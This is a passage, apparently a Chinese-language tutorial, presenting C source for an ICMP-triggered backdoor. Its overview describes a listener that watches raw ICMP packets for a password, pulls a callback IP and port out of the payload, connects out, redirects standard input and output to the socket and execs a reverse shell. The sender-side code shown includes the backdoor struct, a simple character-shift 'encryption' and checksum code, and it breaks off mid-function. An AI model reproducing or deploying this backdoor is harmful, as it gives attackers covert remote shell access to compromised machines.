#概述
1.创建原始套接字(icmp),分别为发送端和接收端,另外再起一个进程绑定一个端口进行tcp监听。
2.发送端向接收端发送icmp包后,接收端过滤icmp包后获得发送端发出的icmp包再解包和解密,当口令正确,解析icmp_data段的ip和port。
3.拿到ip和port后,创建一个tcp套接字去connect这个addr,连接成功后将stdin,stdout,stderr重定向到创建的套接字中,再execl反弹shell就完成了.
源码
发送端
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>
#include <setjmp.h>
#include <errno.h>
#define PACKET_SIZE 4096
#define DATA_LEN 46
/*icmp包内存*/
char sendpacket[PACKET_SIZE]; //icmp packet size
/*传递密码和监听ip和port*/
struct backcdoor
{
char key[40];
char cryip[10];
char cryport[5];
};
typedef struct backcdoor backcdoor;
backcdoor send_bd;
unsigned short cal_chksum(unsigned short *addr,int len);
void cry_bd(backcdoor*bd);
void cry_bd(backcdoor*bd);
void send_packet(int sockfd,struct sockaddr_in *dst, int pid, backcdoor*bd);
//crc32的校验计算方法
unsigned short cal_chksum(unsigned short *addr,int len)
{
int nleft=len;
int sum=0;
unsigned short *w=addr;
unsigned short answer=0;
while(nleft>1)
{
sum+=*w++;
nleft-=2;
}
if( nleft==1)
{
*(unsigned char *)(&answer)=*(unsigned char *)w;
sum+=answer;
}
sum=(sum>>16)+(sum&0xffff);
sum+=(sum>>16);
answer=~sum;
return answer;
}
/*加密*/
void cry_bd(backcdoor*bd)
{
int len = strlen(bd->key);
for(int i = 0; i < 31; i++)
{
bd->key[i] += 5;
}
bd->cryport[0] = bd->cryport[0] + 6;
bd->cryip[0] = bd->cryip[0] + 1;
}
/*组包*/
int pack(int pid, backcdoor*bd)
{
struct icmp *icmp;
int packetsize=8